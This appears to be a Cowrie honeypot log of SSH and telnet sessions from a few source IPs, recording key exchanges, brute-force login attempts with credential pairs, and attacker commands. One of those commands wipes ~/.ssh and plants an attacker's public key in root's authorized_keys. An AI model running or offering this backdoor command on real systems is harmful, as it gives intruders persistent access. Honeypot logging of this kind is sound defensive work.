{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:48.079003Z","src_ip":"212.227.235.229","session":"9857d3ea539c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47994,"dst_ip":"1.2.3.4","dst_port":22,"session":"6f28373d74fc","protocol":"ssh","message":"New connection: 212.227.235.229:47994 (1.2.3.4:22) [session: 6f28373d74fc]","sensor":"my-vps","timestamp":"2025-08-28T15:56:48.534146Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:48.535036Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:48.765770Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:56:48.975364Z","src_ip":"212.227.235.229","session":"9857d3ea539c"}
{"eventid":"cowrie.login.success","username":"root","password":"P2ssw0rd","message":"login attempt [root/P2ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:49.728152Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:50.206032Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.206879Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.208509Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.210901Z","src_ip":"212.227.235.229","session":"9857d3ea539c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60362,"dst_ip":"1.2.3.4","dst_port":22,"session":"bd7f2467d5bd","protocol":"ssh","message":"New connection: 212.227.235.229:60362 (1.2.3.4:22) [session: bd7f2467d5bd]","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.417128Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.418041Z","src_ip":"212.227.235.229","session":"bd7f2467d5bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.439221Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.633978Z","src_ip":"212.227.235.229","session":"bd7f2467d5bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:56:50.960496Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:56:50.961321Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.193664Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.194653Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48994,"dst_ip":"1.2.3.4","dst_port":22,"session":"7767127dd93e","protocol":"ssh","message":"New connection: 212.227.235.229:48994 (1.2.3.4:22) [session: 7767127dd93e]","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.422988Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.423849Z","src_ip":"212.227.235.229","session":"7767127dd93e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.538315Z","src_ip":"212.227.235.229","session":"bd7f2467d5bd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.647857Z","src_ip":"212.227.235.229","session":"7767127dd93e"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.755860Z","src_ip":"212.227.235.229","session":"cdd831b4402a"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:51.757091Z","src_ip":"212.227.235.229","session":"bd7f2467d5bd"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:56:52.585138Z","src_ip":"212.227.235.229","session":"7767127dd93e"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:53.811944Z","src_ip":"212.227.235.229","session":"7767127dd93e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50072,"dst_ip":"1.2.3.4","dst_port":22,"session":"825a0294d5b7","protocol":"ssh","message":"New connection: 212.227.235.229:50072 (1.2.3.4:22) [session: 825a0294d5b7]","sensor":"my-vps","timestamp":"2025-08-28T15:56:54.034781Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:56:54.035490Z","src_ip":"212.227.235.229","session":"825a0294d5b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:56:54.266405Z","src_ip":"212.227.235.229","session":"825a0294d5b7"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:56:55.227076Z","src_ip":"212.227.235.229","session":"825a0294d5b7"}
{"eventid":"cowrie.session.closed","duration":"6.9","message":"Connection lost after 6.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:55.458331Z","src_ip":"212.227.235.229","session":"6f28373d74fc"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:56:55.459437Z","src_ip":"212.227.235.229","session":"825a0294d5b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":62142,"dst_ip":"1.2.3.4","dst_port":22,"session":"7ae0200f8407","protocol":"ssh","message":"New connection: 212.227.125.160:62142 (1.2.3.4:22) [session: 7ae0200f8407]","sensor":"my-vps","timestamp":"2025-08-28T15:57:08.347579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:57:08.348577Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:57:08.453266Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.login.failed","username":"user","password":"fuckers","message":"login attempt [user/fuckers] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:08.962125Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.login.failed","username":"user","password":"fletcher","message":"login attempt [user/fletcher] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:10.075475Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.login.failed","username":"user","password":"content","message":"login attempt [user/content] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:11.177377Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.login.failed","username":"user","password":"account","message":"login attempt [user/account] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:12.282749Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.login.failed","username":"user","password":"906090","message":"login attempt [user/906090] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:13.396066Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.session.closed","duration":"6.3","message":"Connection lost after 6.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:57:14.657322Z","src_ip":"212.227.125.160","session":"7ae0200f8407"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51908,"dst_ip":"1.2.3.4","dst_port":22,"session":"32b30efe99c9","protocol":"ssh","message":"New connection: 212.227.235.229:51908 (1.2.3.4:22) [session: 32b30efe99c9]","sensor":"my-vps","timestamp":"2025-08-28T15:57:49.872255Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:57:49.873247Z","src_ip":"212.227.235.229","session":"32b30efe99c9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:57:50.177812Z","src_ip":"212.227.235.229","session":"32b30efe99c9"}
{"eventid":"cowrie.login.failed","username":"es","password":"abc123","message":"login attempt [es/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:57:51.442085Z","src_ip":"212.227.235.229","session":"32b30efe99c9"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:57:52.748738Z","src_ip":"212.227.235.229","session":"32b30efe99c9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57407,"dst_ip":"1.2.3.4","dst_port":23,"session":"2834692c432a","protocol":"telnet","message":"New connection: 212.227.235.229:57407 (1.2.3.4:23) [session: 2834692c432a]","sensor":"my-vps","timestamp":"2025-08-28T15:57:52.973235Z"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:57:59.515532Z","src_ip":"212.227.125.160","session":"e40c4effd235"}
{"eventid":"cowrie.session.closed","duration":180.12006282806396,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:57:59.520261Z","src_ip":"212.227.125.160","session":"e40c4effd235"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43730,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ae0defba747","protocol":"ssh","message":"New connection: 212.227.235.229:43730 (1.2.3.4:22) [session: 2ae0defba747]","sensor":"my-vps","timestamp":"2025-08-28T15:58:04.594860Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:58:04.595766Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:58:04.802073Z","src_ip":"212.227.235.229","session":"2ae0defba747"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45012,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dbe050ffa0c","protocol":"ssh","message":"New connection: 212.227.235.229:45012 (1.2.3.4:22) [session: 0dbe050ffa0c]","sensor":"my-vps","timestamp":"2025-08-28T15:58:05.147852Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:58:05.148956Z","src_ip":"212.227.235.229","session":"0dbe050ffa0c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c